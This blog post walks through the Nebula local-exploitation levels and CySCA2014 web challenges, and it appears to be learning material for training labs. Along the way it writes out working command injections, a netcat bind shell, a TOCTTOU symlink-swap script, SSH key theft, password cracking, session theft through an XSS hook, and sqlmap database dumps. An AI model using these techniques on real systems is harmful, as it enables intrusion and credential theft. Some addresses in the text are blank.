Exploit Exercises – Nebula

The Exploit Exercises website provides a number of downloadable virtual machines, each of which presents the user with a different set of exploitation challenges. In this blog post we’ll take a look at the challenges in the Nebula virtual machine, which focus on local Linux exploits and source code vulnerabilities. Nebula consists of 20 challenges that become increasingly difficult. At the time of writing I’ve only made it to challenge 11, and it looks like I’ll have to improve my coding abilities before I can make it further. I’ll keep updating this blog post as I learn more and complete more challenges.


Level 00

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories. Alternatively, look at the find man page.

Executing the command ‘find / -name flag00’ reveals an executable – flag00 – located in a hidden directory: /bin/…/. Executing this file elevates the user to the ‘flag00’ account, at which point the command ‘getflag’ can be executed.
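A more general approach is to search by owner and setuid bit instead of by name; on Nebula that would be ‘find / -user flag00 -perm -4000 2>/dev/null’. The demo below creates a setuid-mode file in a scratch directory just to show the find syntax:

```shell
# Demo: find files by the setuid permission bit (04000)
dir=$(mktemp -d)
touch "$dir/suid_demo"
chmod 4755 "$dir/suid_demo"      # set the setuid bit on our own file
find "$dir" -perm -4000          # prints the path to suid_demo
```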


Level 01

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code for this challenge can be found here.

The flaw is that the command ‘echo’ is executed using ‘/usr/bin/env’. Normally ‘echo’ refers to one specific application; mine refers to ‘/bin/echo’, and you can find yours by typing ‘which echo’. However, with ‘/usr/bin/env echo’ the operating system will look for the ‘echo’ application in the directories specified by the $PATH environment variable. This allows an attacker to modify $PATH and supply a different ‘echo’ application to be executed.

The attacker can add their home folder to $PATH using the command ‘PATH=/home/level01:$PATH’. The home folder now appears before any other folder in $PATH, meaning it is the first place Linux will look. The attacker then creates a file called ‘echo’ containing a command such as ‘/bin/getflag’, and makes it executable with ‘chmod 777 echo’. Since the vulnerable program runs with the permissions of flag01, so does ‘/bin/getflag’.
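The same trick can be reproduced on any Linux box with a harmless stand-in for getflag; the /tmp/pathdemo naming below is my own choice for the demo:

```shell
# Demo of the $PATH hijack: a fake 'echo' shadows /bin/echo
mkdir -p /tmp/pathdemo
printf '#!/bin/sh\necho hijacked\n' > /tmp/pathdemo/echo
chmod +x /tmp/pathdemo/echo
# /usr/bin/env resolves 'echo' through $PATH, so the fake one runs first
PATH=/tmp/pathdemo:$PATH /usr/bin/env echo "anything"   # prints: hijacked
```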


Level 02

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

Source code for this challenge can be found here.

The flaw in the code is that it builds a shell command from an environment variable the attacker controls, namely $USER. Normally, $USER holds the name of the current user account. When executing the program, it will echo “level02 is cool”:

level02@nebula:/home/flag02$ ./flag02

about to call system(“/bin/echo level02 is cool”)

level02 is cool

By setting USER=';getflag;echo' the attacker can inject additional commands into the string passed to system(). The results are the following:

level02@nebula:/home/flag02$ ./flag02

about to call system(“/bin/echo ;getflag;echo is cool”)

You have successfully executed getflag on a target account

is cool
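The effect of the semicolons is easy to see locally; here ‘echo INJECTED’ stands in for getflag:

```shell
# Simulate the vulnerable system("/bin/echo $USER is cool") call with an injected value
USER=';echo INJECTED;echo'
sh -c "/bin/echo $USER is cool"
# The semicolons split the line into three commands, so INJECTED is printed on its own line
```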


Level 03

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.

The premise of this level is easy enough: a cron job executes every couple of minutes and runs everything in the ‘/home/flag03/writable.d’ directory. The attacker can create a file, make it executable, and place it in /home/flag03/writable.d, and its command(s) will get executed. One thing to keep in mind: even though you can trigger the job manually by executing /home/flag03/writable.sh, this will not work because the job will then run with your (level03) permissions. You need to wait for the task to execute automatically so that it runs with flag03 permissions.

The issue is that the output of the commands will not appear in your shell, so you can’t see the results of successfully running the ‘getflag’ command. You can trust that the command ran successfully but this is a little anti-climactic. An alternative is that instead of just running ‘getflag’ you redirect the output results to a file, like so:

getflag > /tmp/output.txt

Just make sure that the output gets saved in a location where flag03 has write permissions.
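A drop-in script might look like the sketch below. To keep it runnable anywhere, the demo uses a scratch directory and ‘id -un’ in place of the real /home/flag03/writable.d and getflag:

```shell
# Stand-in for /home/flag03/writable.d (use the real path on Nebula)
WRITABLE=$(mktemp -d)
cat > "$WRITABLE/exploit.sh" <<'EOF'
#!/bin/sh
# On Nebula this line would be: getflag > /tmp/output.txt
echo "ran as $(id -un)" > /tmp/cron_demo_output.txt
EOF
chmod +x "$WRITABLE/exploit.sh"
"$WRITABLE/exploit.sh"           # the cron job does this step as flag03
cat /tmp/cron_demo_output.txt
```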

Of course, if you want to get a shell so that you can manually execute the ‘getflag‘ command there are ways to do that too. One way is to have the script open a local port with netcat and to assign a shell to anyone that connects, using the command:

nc.traditional -l -p 4444 -e /bin/bash

You can then connect remotely to the port and you’ll be given a shell to the system with all the privileges of the flag03 account.


Level 04

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂

Source code for this challenge can be found here.

The source code for this challenge tells us that the vulnerable program will not open any file that has “token” in the name. The solution here was simple; since we cannot open any file with ‘token’ in the name, we create a hard link to the ‘token’ file with a different name using the command:

ln /home/flag04/token /home/level04/hardlink

We can then execute the ‘flag04’ program on the hardlink, and it will actually run on the token file.

level04@nebula:/home/flag04$ ./flag04 /home/level04/hardlink

The content of the token file is actually the password to the flag04 account – something that we’ll see again in later challenges. This allows us to log in as flag04 and run the ‘getflag‘ command.
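The reason this works is that a hard link is simply a second directory entry for the same underlying inode, so the filename check never sees the string ‘token’ even though the contents are identical. A quick local demo:

```shell
# Hard links: two names, one file
echo "secret contents" > /tmp/token_demo
ln -f /tmp/token_demo /tmp/hardlink_demo
cat /tmp/hardlink_demo           # prints: secret contents
```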


Level 05

Check the flag05 home directory. You are looking for weak directory permissions.

Investigation of the ‘/home/flag05‘ folder shows that there are two hidden directories: ‘.ssh’ and ‘.backup’. The ‘.ssh’ directory typically contains private ssh keys. If we can get our hands on flag05’s private ssh key we should be able to establish an ssh session under flag05’s account without having to enter a password, as long as the private ssh key is not encrypted with a passphrase.

Unfortunately, the ‘/home/flag05/.ssh’ directory has restrictive permissions and the level05 account doesn’t have access to it. Let’s try the ‘/home/flag05/.backup’ directory instead. This directory has a gzipped file in it named ‘backup-19072011.tgz’. The directory and the file have weak permissions set, and the level05 account has access to them. We can copy the file over to our home directory, unzip it, and inspect it.

It turns out that the backup file contains a copy of an RSA private key. We’ll continue under the assumption that this is the private key for flag05; it doesn’t specifically say so in the file, but since it was found in flag05’s home directory it is a safe assumption. We can proceed to copy the file over to our remote system using the following command:

scp backup-19072011 root@<IP ADDRESS>:/root/

In order to establish an ssh session without having to provide a password for flag05, we need to copy the private RSA key into ‘/root/.ssh/id_rsa’. Note that I’m logged into my system as root so that’s where the key goes. If you’re logged in as a different user, use the ‘.ssh’ folder under your home directory instead.

Before copying the private RSA key over, we need to remove some of the other information that was in the backup file. Specifically, everything that is not in between the following lines:

-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----

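One way to carve out just the key block is with sed. The demo below is self-contained and uses obviously fake key material; on the Nebula backup you would point it at the extracted file instead:

```shell
# Create a stand-in backup file: junk around a PEM block
cat > /tmp/backup_demo <<'EOF'
unrelated backup noise
-----BEGIN RSA PRIVATE KEY-----
FAKEKEYLINE1
FAKEKEYLINE2
-----END RSA PRIVATE KEY-----
trailing noise
EOF
# Keep only the lines between (and including) the PEM markers
sed -n '/-----BEGIN RSA PRIVATE KEY-----/,/-----END RSA PRIVATE KEY-----/p' \
    /tmp/backup_demo > /tmp/id_rsa_demo
chmod 600 /tmp/id_rsa_demo       # ssh refuses private keys with loose permissions
cat /tmp/id_rsa_demo
```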
You may also want to create a backup of the ‘id_rsa‘ file that is already there on your system, so that you can restore it to how it was at a later stage.

cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bak

Once you copy the right content into ‘/root/.ssh/id_rsa’ you can then establish an ssh session under the flag05 account and you will not be prompted for a password:

root@kali:~# ssh flag05@<Exploit Exercises IP Address>

flag05@nebula:~$ getflag
You have successfully executed getflag on a target account

If you are getting an error message while trying to connect, or if you are asked for a passphrase or password, there is something wrong with the ‘id_rsa’ file: check that its contents match the PEM block exactly and that its permissions are restrictive (chmod 600 ~/.ssh/id_rsa). Try establishing an ssh session using the ‘-v’ flag for verbose output to troubleshoot the issue.


Level 06

The flag06 account credentials came from a legacy unix system.

This level requires us to do some basic password cracking. The description for the level tells us we have to inspect flag06’s account credentials, which means we have to look at the ‘/etc/passwd‘ file. The password file clearly shows that the entry for flag06 is different from those for other accounts:

cat /etc/passwd


On old UNIX systems, a user’s password hash would be stored in the ‘/etc/passwd’ file, as is the case for flag06. To crack this hash, we simply copy the entry for flag06 over into a file on our system and run John the Ripper (a common password cracking tool) against it.

root@kali:~# john flag06.pwd
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello (flag06)
guesses: 1 time: 0:00:00:00 DONE (Sun Nov 16 10:07:08 2014) c/s: 39341 trying: 123456 - Pyramid
Use the “--show” option to display all of the cracked passwords reliably

The password is “hello”. We can now ssh into the flag06 account and successfully execute the ‘getflag’ command.


Level 07

The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server.

Source code for this challenge can be found here.

There are two files located in the ‘/home/flag07‘ directory: ‘index.cgi’ and ‘thttpd.conf’. The first is a simple Perl script and the second is a configuration file for a web server. Reading the configuration file reveals that the server is running on port 7007 and should be running under the ‘flag07’ user.

Connecting to the web server from our remote system showed that index.cgi is accessible to anyone.


The Perl script can be invoked by passing an argument to index.cgi, such as http://<webserver>:7007/index.cgi?Host=<address>. The source code of the Perl script doesn’t seem to perform any input validation or sanitization, so we should be able to pass more than just a host address to it. By using a pipe, we can pass the script a system command that will also get executed:
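In practice this means requesting something like ‘index.cgi?Host=localhost%7Cgetflag’, where %7C is the URL-encoded pipe (the exact host value here is my own choice). Why the pipe works is easy to demonstrate locally:

```shell
# What happens when user input containing a pipe is interpolated into a shell command
Host='localhost|echo INJECTED'
sh -c "echo pinging $Host"       # prints: INJECTED
# The shell treats '|' as a pipeline separator, so 'echo INJECTED' runs as its
# own command, and its output replaces what the first echo wrote to the pipe
```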


This provided the message that ‘getflag’ was successfully executed on a target account.


Level 08

World readable files strike again. Check what that user was up to, and use it to log into flag08 account.

The folder ‘/home/flag08‘ contains a network capture file: ‘capture.pcap’. The easiest way to analyze a PCAP file is using Wireshark, but it’s not the only way. To use Wireshark, copy the PCAP file over to your remote system using the secure copy command (scp). You can also analyze the file on the local system, but instead of Wireshark you’ll have to use tcpdump. Tcpdump is what I’ll use in the walkthrough for this challenge.

tcpdump -qns 0 -X -r capture.pcap

The output won’t be particularly easy to read but once you know what you’re looking for it’s fairly straightforward. The first couple of packets can be ignored – these have to do with establishing the session. What we’re interested in comes after you see the following:

21:23:12.339391 IP > tcp 75

Note that I removed the hex code and only kept the ASCII for better legibility.

This packet shows that the user was trying to log into a service – there is a clear prompt for a username and password. The next couple of packets will show us the login name that the user entered. However, you won’t see one single packet with a username in it. Instead the traffic looks like telnet traffic, in which a single entered character is sent to the server and the server echoes it back to the user. Additionally, you have to know what part of the packet to look at. The following packets will demonstrate this:

21:23:24.491452 IP > tcp 1


21:23:24.496998 IP > tcp 2


21:23:24.591456 IP > tcp 1


21:23:24.597002 IP > tcp 2


As you can see, most of the information in the packets is not of interest to us. Only the last character is what the user actually entered in the command prompt, and this character is echoed back by the server. Going through the next few packets shows us that the user entered ‘level8’ as their username.

Skipping a few packets, we can then see the server prompting the user for a password:

21:23:26.095219 IP > tcp 13


The password was more difficult to decipher than the username was. First of all, the server doesn’t echo anything back like with the username, most likely as a security measure – you often don’t get to see the password as you’re typing it in so as to avoid someone shoulder surfing you. This is not necessarily an issue but it makes it a little bit harder to figure out what the user sent and what the server received.

The first part of the password was easy enough: ‘backdoor’. However, after backdoor there is a series of messages sent between the user and the server that doesn’t seem to contain anything, except some periods. Then there are a few more packets with legible characters: ‘00Rm8’. Then there are some more periods, and finally the user sends three more characters to the server: ‘ate’.

After going through the file a few more times, I finally deduced that what the user sent to the server in its entirety was ‘backdoor...00Rm8.ate’. From that string it’s easy to figure out that a period represents a backspace: the user made a couple of mistakes while typing the password and corrected them. Therefore, the password that was sent to the server was ‘backd00Rmate’.
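The reconstruction can also be scripted. This POSIX-shell sketch replays the captured keystrokes, treating each ‘.’ (a non-printable byte in tcpdump’s ASCII column, evidently a backspace) as deleting the previous character:

```shell
# Replay keystrokes, applying '.' as backspace
keys='backdoor...00Rm8.ate'
out=''
while [ -n "$keys" ]; do
  c=${keys%"${keys#?}"}          # first character of $keys
  keys=${keys#?}                 # drop that character
  if [ "$c" = "." ]; then
    out=${out%?}                 # backspace: remove the last character typed
  else
    out=$out$c
  fi
done
echo "$out"                      # prints: backd00Rmate
```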

This password allows for logging in to the Nebula box as the flag08 account, at which point you can successfully execute the ‘getflag’ command.


Level 09

There’s a C setuid wrapper for some vulnerable PHP code…

Source code for this challenge can be found here.

There are two files under ‘/home/flag09‘: an executable called ‘flag09’, and a PHP sourcecode file called ‘flag09.php’ which is called by ‘flag09’ when executed. The PHP script calls a function that takes two parameters from the command line, although it only actually uses the first one. The first parameter is supposed to be the path to a file. The contents of that file will be modified in the function according to some regex and then output to the screen.

The function uses the PHP built-in function ‘preg_replace()’ to modify how it outputs the file contents. If it encounters any lines that include the string “[email” it calls another function, spam(), by use of the ‘/e’ modifier. The ‘/e’ modifier makes preg_replace() evaluate the replacement as PHP code, which leaves it open to exploitation. You can read about this vulnerability here: https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace.

We have to do two things to exploit this vulnerability: set the value of the ‘$use_me’ variable, and reference it inside a file so that it gets executed when the spam() function is called. The first part is easy; the PHP script sets $use_me to whatever our second command line argument is. Then we have to call it. I created a file in ‘/home/level09’ called “test.txt” containing the following string:

[email system($use_me)]

I then ran the ‘flag09’ file as follows:

/home/flag09/flag09 /home/level09/test.txt getflag

The results:

level09@nebula:~$ System(getflag).

Apparently, I am successfully calling the $use_me variable, but the system command itself is not getting executed. In order for this command to be interpreted and executed as a system command, it has to be wrapped in curly braces. After some experimentation, the following syntax worked for me:

[email {${system($use_me)}}]

Again executing the flag09 program with the same command line arguments now resulted in the following:

level09@nebula:~$ /home/flag09/flag09 /home/level09/test.txt getflag
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

Despite an error thrown by the script because the code injection affects its interpretation of PHP code, the getflag command was successfully executed.


Level 10

The setuid binary at /home/flag10/flag10 will upload any file given, as long as it meets the requirements of the access() system call.

Source code for this challenge can be found here.

The source code for level 10 outlines a program that takes two command line arguments. The first one is a file path, and the second one is a host to send the file to. If the user has access to the file, the program writes the contents of it to port 18211 on the specified host.

There is also a ‘token’ file located in the flag10 home directory, but the ‘level10’ user doesn’t have read access to this file. It seems the challenge is to somehow exploit the program to provide us with access to the token file.

Inspection of the source code shows that it might be vulnerable to a “TOCTTOU” (Time Of Check To Time Of Use) attack. This vulnerability exists when a program first checks a condition and then uses the result of that check at a later time. In this challenge’s source code, the program checks whether the user has access to a file at line 24 and opens the file for reading at line 54. A TOCTTOU attack means providing the program with a file that the user does have access to, so that the check at line 24 succeeds, and then swapping that file for one the user doesn’t have access to (the token file) before line 54 executes.

There are a couple of preparatory steps that need to be taken before attempting to exploit the program. First of all, a script needs to be run that continuously swaps out a file that we have access to with the token file. The easiest way to accomplish this is to create a symbolic link to a file and to have the script change the target of the symbolic link back and forth. The commands for this are:

echo "testing token" > faketoken               # create fake token file

ln -sf /home/level10/faketoken file            # create symbolic link named 'file' pointing at the fake token

vi tocttouscript.sh                            # create the tocttou script:

#!/bin/sh
COUNT=1                                        # create counter
while true                                     # run forever
do
    echo $COUNT                                # I like to echo counters on each run to make sure it's running
    ln -sf /home/flag10/token file             # point the symbolic link at the real token
    ln -sf /home/level10/faketoken file        # point it back at the fake token
    COUNT=$((COUNT+1))                         # increase counter by one
done
So now we have the symbolic link and the shell script responsible for constantly changing out the target. We also need to set up a host to listen on port 18211 for the incoming file. I simply opened up a port with netcat on my remote system. The command for this is:

ncat -l 18211 --keep-open

The ‘keep-open’ flag is important here because without it, the connection gets closed as soon as input is received. The TOCTTOU attack is somewhat of a trial and error attack – the swapping out of the files has to happen at the exact right moment (between the moment the access permissions are checked and the moment the result of the check is used) and this is unlikely to happen on the first occurrence. Numerous repeated attempts will be made until the timing is just right and everything lines up, so we want to make sure our host and port keep listening until that happens.

Now everything is in place to start the attack. The first thing to do is run the script we wrote, so that the symbolic link’s target starts being swapped back and forth.


Next we want to execute the ‘flag10’ program, but we don’t want to execute it just once. We want to execute it multiple times in a row because, again, this exploit is somewhat of a trial and error process. To accomplish this we could write a second script and execute that, or we can simply execute a while-loop from the command line, where ‘<host>’ gets replaced with the IP address of your listening server:

while true; do /home/flag10/flag10 /home/level10/file <host>; done

Below is some of the information that I received on my open netcat connection:

root@kali:~# ncat -l 18211 --keep-open
.oO Oo.
testing token
.oO Oo.
testing token
.oO Oo.
.oO Oo.
.oO Oo.
testing token

As you can tell, the first two runs of the program did not coincide with the files being correctly swapped, but the next two runs did. The contents of the ‘token’ file appear to be “615a2ce1-b2b5-4c76-8eed-8aa5c4015c27”. Establishing another ssh connection from Kali to the Exploit Exercises box and authenticating with username “flag10” and the token as password results in a successful login. We can now execute the ‘getflag’ command and complete this challenge.


That is as far as I’ve gotten so far with Exploit Exercises. As I complete more challenges, I’ll add more entries to this blog post.


CySCA2014 Web Application Pentest

CySCA2014 Write-Up

CySCA2014 is an Australian cybersecurity challenge that occurred over 24 hours on May 7th, 2014. Afterwards, the challenges were made available for download for anyone interested in attempting them. The link to download CySCA2014 is https://cyberchallenge.com.au/inabox.html. The challenges included web penetration testing, Android forensics, reverse engineering, cryptography, and more. Together with two friends I attempted to solve these challenges and what follows is a write-up of our process. We are only just getting started on CySCA2014 so as we solve more challenges, more blog posts will be added.

Web Application Pentest

Club Status

Only VIP and registered users are allowed to view the Blog. Become VIP to gain access to the Blog to reveal the hidden flag.

CySCA2014 includes a website for a fictional company called Fortress Certifications. The website has several sections: ‘services’, ‘about’, ‘contact’, ‘blog’, and ‘sign in’. The ‘blog’ section of the website is grayed out and as the challenge description indicates, the user has to become ‘VIP’ to gain access to this section of the website.


Solving this challenge was fairly straightforward. After firing up Burpsuite and configuring the web browser to use it as a proxy, it quickly became clear that the website sets a cookie on the client machine with a ‘vip’ parameter to determine whether a user is a VIP or not. Intercepting a request from the client to the server and changing the value from ‘vip=0’ to ‘vip=1’ granted access to the ‘blog’ section of the website and revealed the flag there.




For anyone new to Burpsuite, here’s some information that will make your life a little easier. You can add ‘match and replace’ rules using ‘Proxy’ -> ‘Options’ to automatically change the cookie value from ‘vip=0’ to ‘vip=1’ in the future, so you don’t have to manually change it on each request. Even if you turn intercept off, the request will still be changed. As long as the rule is marked ‘enabled’ you will remain vip.


Om nom nom nom

Gain access to the Blog as a registered user to reveal the hidden flag.

Although we now have access to the blog, we are still identified as ‘guest’ as can be seen in one of the previous screenshots. This challenge requires us to become authenticated as a registered user. Our first instinct was to bruteforce our way in through the ‘sign in’ section of the site, using a list of usernames that was previously found under ‘contact’.


There are various ways in which a login form can be attacked, such as using the ‘intruder’ tool in Burpsuite or using a command line tool such as Hydra. Both of these tools and multiple wordlists were used in an attempt to find a valid combination of username and password, but after several hours of bruteforcing we had to acknowledge that becoming authenticated wouldn’t be as simple as that. In fact, had we taken the time to read the FAQ section of the challenge site we could have saved ourselves a significant amount of time, since it clearly states that bruteforcing passwords is never required.


Alright, so another method of becoming authenticated needs to be found. After browsing around the website and the blog for quite some time trying to find another way in, we noticed that a user was active on one of the blog posts. ‘Sycamore’ had last viewed one of his posts as recently as 37 seconds ago. Clearly there was an automated job set up on the Cysca box where this page was being refreshed regularly while being logged in as user Sycamore.


The first thing that came to mind was to use a cross site scripting (XSS) attack to steal Sycamore’s session ID. However, after leaving numerous comments with XSS code in various formats it became clear that comments were being filtered for this. So if we can’t inject XSS code into the site, how do we steal Sycamore’s session ID?

One thing that we have really enjoyed during almost all of the CySCA2014 challenges we’ve solved so far is that the solution can often be found in small details. In this case, we finally noticed a note underneath the comments section that said: “Links can be added with [Link title](http://example.com)”. So although we can’t insert XSS code into a comment directly, maybe we can add it to a link reference.

We fired up the ‘Beef-xss’ application and – after some playing around with different formats – submitted the following comment:

[<script src=””></script>(www.example.com)pwnt]

When viewing the blog entry, the comment only shows up as “pwnt”, but in the background the user’s browser actually loads our script, which ‘hooks’ it into beef-xss and allows us to manipulate it in all sorts of ways. In this case, all we really needed was to steal the session ID from the cookie and use it in place of our own. After doing so, we were successfully authenticated as ‘Sycamore’ and the second flag was shown on the screen.






Remember, like before you can add a ‘match and replace’ rule to Burpsuite to automatically replace your own session ID with Sycamore’s so that you don’t have to manually replace it every time.

Nonce-sense

Retrieve the hidden flag from the database.

This is where things really started to get challenging. The previous challenge gave us some trouble for a while, but the whole time we knew we were at least on the right track. With this one we had some moments where we were ready to give up. Fortunately, we stuck with it and after many hours of banging our heads against the wall we finally gained access into the database. Here’s how we did it.

Right away, seeing how the flag had to be retrieved from a database, we figured SQL injection would be the way to go. However, during the previous challenge we had moments where we couldn’t figure out how to authenticate as Sycamore and in those moments we had already tested most of the parameters in our GET and POST requests for SQL injection – without success. Still, it didn’t take too long for us to find the parameter that could be injected. Now that we were authenticated as Sycamore we were able to delete comments, and the ‘comment_id’ parameter proved vulnerable to SQL injection. We found out by adding a single quote behind the comment_id value and looking at the server response.



Once we found out that the parameter was vulnerable to SQL injection, we figured we were pretty much done. We couldn’t have been more wrong – this is where the challenge really started. There were several issues we had to overcome before we could go from vulnerability to exploitation.

First of all, the server responses to our SQL injection didn’t correspond to any write-ups of SQL attacks we could find. For instance, one of the first things a write-up will tell you to do is figure out how many columns are in the table you’re accessing. You do this by adding a single quote to the parameter value and then appending “order by 10;--”, which tells the SQL server to sort the results by column number 10. This will either result in a valid SQL statement, which you can recognize by the command going through (the comment will be deleted), or it will give an error message such as “unknown column ‘10’ in ‘order clause’”. The latter indicates that there are fewer than 10 columns in the table, so you narrow it down until the command goes through. However, when we tried the ‘order by’ injection, we received the following response from the server:


The server response indicated that it recognized everything we added after the parameter value as incorrect, including the single quote. In other words, we were not successful in ‘breaking out’ of the SQL statement that we were trying to inject into.

We must have spent hours trying to find the right SQL injection to return valuable server information, without any success. Everything we entered would just return the same error message to us (Later on we’ll see that we weren’t encoding our SQL injection commands correctly). At this point you might ask “why didn’t you just use an automated tool such as SQLmap?” Great question; this brings us to issue number two.

The website blog section uses CSRF tokens to prevent cross site request forgery (CSRF). These tokens were also successful in stopping us from running automated SQL injection tools. The reason is that every request issued to the server has to include a valid CSRF token. The subsequent server response includes a new CSRF token, which has to be sent with the next request. A token is only valid once, and only for about 15-30 seconds. We’re not sure exactly how long it’s valid, but if we waited too long before issuing a request we would invariably get an “invalid CSRF token” error message.


We will spare you all the different ways in which we tried to circumvent this error message; we assume that since you are reading this walkthrough you have already tried most if not all of those same tactics and discovered they did not work. The key to success for us was BurpSuite’s ability to run a macro for each incoming request. Basically, we told BurpSuite that every time it intercepted a request, it had to run a macro that retrieved the latest CSRF token and replaced the original token with the new one before sending the request on to the server.

Let’s look at that step by step. First, set up the macro that you will use. It needs to be a server request that obtains the new CSRF token, so a simple GET request for a blog page will do just fine. To configure the macro, go to ‘Options -> Sessions -> Macro’ and create a new macro.



When you ‘record’ the macro, just select a simple GET request for a blog page from your HTTP history. Now here’s the important part – you have to go to ‘configure item’ and select a custom parameter location from the server response. This is where we go to select the CSRF token and use it as a parameter in our next request. BurpSuite offers the awesome functionality of allowing you to just select what you wish to extract, and it will generate the appropriate syntax for you.



Now that the macro is set up, we need to create a session handling rule under ‘Options -> Sessions -> Session Handling Rules’. The rule has to specify to run our macro, under ‘rule actions’. You also have to set a scope for the rule, by clicking on the ‘scope’ tab. Here you will only select ‘proxy’ for when the rule will run, and for ‘URL scope’ you can either select ‘include all URLs’ or be more specific by selecting ‘use suite scope’. The latter requires you to go to ‘Target -> Scope’ and make sure you have the Cysca box’s URL defined as a target.





Now Burpsuite is configured to replace the CSRF token of incoming requests (sent using Burpsuite as a proxy) with a new and valid CSRF token. The next step is to configure SQLmap to perform SQL injection into the vulnerable parameter and to use Burpsuite as a proxy. The first thing we want to do is generate a ‘delete comment’ POST request that we can use as a template for SQLmap. Generate a ‘delete comment’ request or select one from your HTTP history (make sure it contains Sycamore’s PHPSESSID value in the cookie) and save it into a text file (we just used Leafpad for this). NOTE: Be careful – certain text file editors (vi) will include extra line feeds when you copy and paste a request from Burp into it. These extra line feeds WILL mess up your requests and provide you with invalid results. We spent several hours trying to troubleshoot our macro when all we had to do to get things to work was remove the extra lines from the template file. No fun!!

Alright, now it’s time to fire up SQLmap, tell it to use the text file with the POST request as a template (-r), inform it of which parameter to inject (-p), and point it to BurpSuite as a proxy (--proxy). The command for this is:

sqlmap -r <full path to request file> -p comment_id --proxy=

I would advise doing two things before running this command. (1) Enable intercepting in BurpSuite so that you can see the request that SQLmap is sending out to the server, and (2) go to ‘Options -> Sessions -> Session Handling Rules’ and click ‘open sessions tracer’. The sessions tracer shows the original incoming request, the macro that is run, the action taken as a result of running the macro, and the final request that is sent out to the server. You can look at each of these steps and verify that your macro is running correctly and that it is in fact replacing the CSRF token from the template with a new one from the server for each request made. Notice that the SQL injection that is added to the ‘comment_id’ parameter is HTML encoded. This is why we were previously unable to get information back from the server using manual SQL injection – we weren’t encoding our commands properly.

One more tip for this challenge: if you followed all of the steps described here and you are still having trouble performing SQL injection into the comment_id parameter, try running sqlmap with a delay on its requests (--delay 1 for a one-second delay). We ran into a situation where our macro was running as intended, and looking at the individual requests in the session tracer showed that BurpSuite was inserting a fresh CSRF token into each request before sending it on, but we were still getting ‘invalid CSRF token’ errors in our responses. Again, we must have spent hours troubleshooting this issue when in the end, including a simple one-second delay in our SQLmap request fixed the issue. We’ve also been able to successfully run attacks against the server without this delay so it doesn’t seem to be required, but it’s just something that seemed to work for us when it wouldn’t work without the delay. We thought we’d include it in this walkthrough in case someone else experiences the same thing.





Now that we can successfully run a SQL injection attack against the server, getting the hidden flag is a piece of cake. First we need to enumerate all the databases on the server by using the ‘--dbs’ flag. This will reveal that there are two databases: ‘cysca’ and ‘information_schema’. For this challenge, only the ‘cysca’ database is of interest. Next we have to enumerate the tables in the cysca database. We can do this by specifying the database with ‘-D cysca’ and using the ‘--tables’ flag. There are five tables in the ‘cysca’ database: ‘user’, ‘blogs’, ‘comments’, ‘flag’, and ‘rest_api_log’. Finally, we can dump the information in the ‘flag’ table using the ‘-D cysca’, ‘-T flag’, and ‘--dump’ flags. This reveals that the hidden database flag is “CeramicDrunkSound667”.





Retrieve the hidden flag by gaining access to the caching control panel.

Our first question upon reading this challenge was “What the fuck is the caching control panel??” We had never heard of this before, despite at least one of us being somewhat familiar with web servers. Google did not help us out much, so we figured we’d just start on the challenge and hope that things would become clearer as we made progress.

We started on this challenge by enumerating pretty much everything in the database that we had just compromised. The screenshots below show some of the information that was logged into the ‘log’ file for the server under /usr/share/sqlmap/output.



The ‘users’ table provided us with information on three registered users, including their password hashes and salts, while the ‘rest_api_log’ table provided GET, POST, and PUT requests that had been previously submitted to the server, including an API key for one user.

Our first attempt at making progress on this challenge was to try and crack the user passwords. Again, this was a waste of time, as bruteforcing is never required according to the Cysca FAQ. However, we reached this point before any of us had looked at the FAQ. Hopefully you did not make the same mistake. Needless to say, running hashcat with multiple wordlists and rules did not result in any cracked passwords.

Next we decided to see if we could attack the site’s rest API. On the website’s blog there is a post made by Sycamore that refers to the rest API specification, located at “<cysca>/api/documents/id/3”. Below is a screenshot of the document.


The document describes a couple of things: (1) that any request that modifies content (POST, PUT, and DELETE) needs to be signed with an API signature, (2) how a valid API signature is calculated, (3) what parameters need to be included in GET, POST, and PUT requests, and (4) what a valid and signed POST request looks like. At this point it was pretty clear that we needed to find a way to submit valid POST and/or PUT requests to the server. We didn’t know how it would help us locate the flag in the caching control panel, but we knew it would help us get there. So somehow we needed to find a way to create valid API signatures.

The problem is that the calculation for an API signature includes a shared secret. Without the shared secret, it is impossible to create a valid API signature – at least at first glance. Our first attempt at creating an API signature? Bruteforcing. Seriously – I will never again attempt a CTF challenge without reading the FAQ first.

Our thought process was as follows: We couldn’t crack the password hashes that we found in the database, but we assumed that a user’s password would be the same as their ‘shared secret’ for their API signatures. Since we had obtained a couple of valid API calls including signatures from the database, we might be able to uncover the secret by recreating the known API call and using a wordlist to insert the secret into it. The assumption here is that we were unable to previously crack the passwords due to them being salted, but now we might be successful because the salt doesn’t come into play for the API signature.

We created a script that took the string “contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf”, inserted an entry from a wordlist in front of it (as the secret), created an MD5 hash of the string, and then compared this MD5 hash to the one we knew to be valid for the API call. If the wordlist entry was equal to the secret, then the two MD5 hash values should be the same. Of course, even after using several different wordlists (and waiting for long periods of time for the script to finish) we did not find the secret. So now we were somewhat at a loss. If we don’t know the secret we can’t create valid API signatures, and if we can’t create these signatures then we can’t place valid API calls.
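As a concrete sketch of what that script did (our own reconstruction in Python; in practice the known hash came from the captured API call and the wordlist from files like rockyou.txt):

```python
import hashlib

# The parameter string from the captured API call, with the '&' and '='
# symbols stripped, per the REST API specification.
MESSAGE = "contenttypeapplication/pdffilepath./documents/Top_4_Mitigations.pdf"

def find_secret(known_hash, wordlist):
    """Return the wordlist entry w for which md5(w + MESSAGE) matches the
    captured signature, or None if the secret is not in the wordlist."""
    for word in wordlist:
        if hashlib.md5((word + MESSAGE).encode()).hexdigest() == known_hash:
            return word
    return None
```

As described above, no wordlist we tried contained the secret, so this search always came back empty.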

